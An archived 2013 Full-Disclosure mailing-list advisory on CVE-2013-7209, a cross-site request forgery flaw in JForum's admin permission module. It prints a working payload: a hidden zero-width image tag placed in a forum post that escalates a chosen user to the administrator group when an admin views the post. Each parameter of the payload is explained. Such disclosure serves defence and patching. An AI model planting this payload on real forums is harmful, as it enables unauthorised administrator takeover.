[<prev] [next>] [day] [month] [year] [list]
Message-Id: <D3137469-0630-4F8C-AC45-AC7463A8C11E@dbappsecurity.com.cn>
Date: Thu, 26 Dec 2013 17:03:58 +0800
From: arno <arno.chen@...ppsecurity.com.cn>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [CVE-2013-7209]JForum CSRF(Cross-site request
forgery) Vulnerability
Version : All
Vulnerability : Cross-site request forgery
Problem type : remote
CVE ID : CVE-2013-7209
Jforum Admin module, modify user permissions module exists crsf Vulnerability,use the following code into jforum forum posts, as long as this administrators is opened this post, the permissions of user with id 12696 will be Escalated to the group with id 2 permissions,default group with id 2 is administrator group.
Code:
<img src=http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 width=0 />
Code Description:
http://www.target.com/forum/ jforum forum address,
12696 for the user id
2 group id
width=0 is used to hide pic
It was discovered by arno @dbappsecurity.com.cn
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists